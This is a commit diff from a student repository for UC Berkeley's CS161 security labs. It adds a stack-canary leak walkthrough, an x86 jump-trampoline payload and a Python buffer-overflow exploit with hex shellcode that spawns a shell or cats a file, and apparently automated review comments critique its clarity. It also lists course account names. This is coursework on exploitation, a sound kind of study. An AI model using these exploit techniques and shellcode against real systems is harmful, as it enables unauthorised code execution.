Unverified Commit a29af5fc authored by Recolic Keghart

fucking documents

parent 29898fdf
# cs161
ucb cs161 labs
Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
......@@ -7,33 +8,9 @@ Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
https://acropolis.cs.berkeley.edu/~account/webacct/
Account: cs164-ace
Password:
to change the password: `ssh update.cs.berkeley.edu`
Account: cs161-atw
To change the password: `ssh update.cs.berkeley.edu`
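Review bot: the last two lines of this hunk, `to change the password: `ssh update.cs.berkeley.edu`` and `To change the password: `ssh update.cs.berkeley.edu``, repeat each other with different capitalisation; keep one. The hunk also lists two accounts (`cs164-ace` and `cs161-atw`) without saying which is used for what, and it commits a login name together with an encrypted password to the README. A committed secret stays in the repository history even after a later commit removes it, so this material is better kept outside the repo, with the README pointing at where it lives.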
proj1/161-proj1-5.png

656 KiB

......@@ -223,6 +223,11 @@ with open('/dev/fd/1','wb') as f:
## 4
The solution is easy. Since BUFLEN=16, I send `0123456789ab\x`, then dehexify skips the `\0` and prints everything in canary area.
Now I construct a message with 16 junk characters to fill the buffer, correct canary, another 8 characters to shift ebp & other staffes, and the return address, then the shellcode.
## 5
- motivation
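Review bot: the `## 4` walkthrough leaves its key step unexplained: it says dehexify "skips the `\0`" after the input `0123456789ab\x`, but not which `\0` is skipped or why the trailing `\x` causes it, so a reader cannot reproduce the canary leak from the text alone; one sentence on how the escape is handled would fix that. Also `staffes` should read `stuff`, and `## 5` ends the hunk with a lone `- motivation` bullet and no body.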
......@@ -266,8 +271,22 @@ However, we need a fixed-address writable page to put `%ebp`. The page `0x080480
Please see the image below. The procedure is too complicated to explain.
![Please contact root@recolic.net if you can not view this image](https://dl.recolic.net/res/161-proj1-5.png)
Because I have 40 bytes ahead for payload, I can put a shellcode to launch /bin/sh directly. But if I want to create tcp server, I have to write a simple payload and jmp to `&buf+68`. The simple payload is attached below.
```
// get current addr
call foo
foo:
pop %eax
// 40 + 4+4+4+4+4+4+4 - 5
add $63, %eax
jmp *%eax
```
I put 5 `nop` at `&buf+68` to make it work even if I have made a mistake.
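Review bot: the offset in `add $63, %eax` is justified only by the comment `// 40 + 4+4+4+4+4+4+4 - 5`, which names neither what the seven 4-byte words are nor what the `-5` compensates for (the 5-byte encoding of `call foo`, which is why `pop %eax` yields the address of `foo`); spelling out that layout would make the `&buf+68` target and the five `nop`s explicit rather than a matter of counting. The section also defers the whole procedure to an image hosted off-repo (`dl.recolic.net`), so the notes do not stand on their own if that host disappears; a short text description belongs here. The code fence has no language tag.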
......@@ -47,17 +47,19 @@ canary = reply_canary
fill2 = "\0"*8
retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
#payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
# This payload works! It cat README to stdout. Uncomment print(p.recvline()) to use it.
payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
#payload = SHELLCODE
# This payload also works! It cat README to stderr.
payload = SHELLCODE + '\0'
msg = fill1 + canary + fill2 + retaddr + payload + '\n'
#print(msg)
p.send(msg)
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
#print(p.recvline())
#print(p.recvline())
#print(p.recvline())
#print(p.recvline())
##print(p.recvline())
# HINT: the last line of your exploit should look something like:
# p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
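Review bot: `payload` is assigned from the hex string (`payload = fuck_raddr("6a3158cd...", False)`) and then overwritten two lines later by `payload = SHELLCODE + '\0'`, so the first assignment, annotated "This payload works!", is dead code; comment it out like the neighbouring alternatives or delete it so the comments describe what actually runs. The return address is a bare literal, `fuck_raddr("bffffaf4")`, with the same value repeated in the trailing `# "bffffaf4"` comment, which adds nothing; say where the value came from instead. The five unconditional `print(p.recvline())` calls will block if the service returns fewer lines than expected.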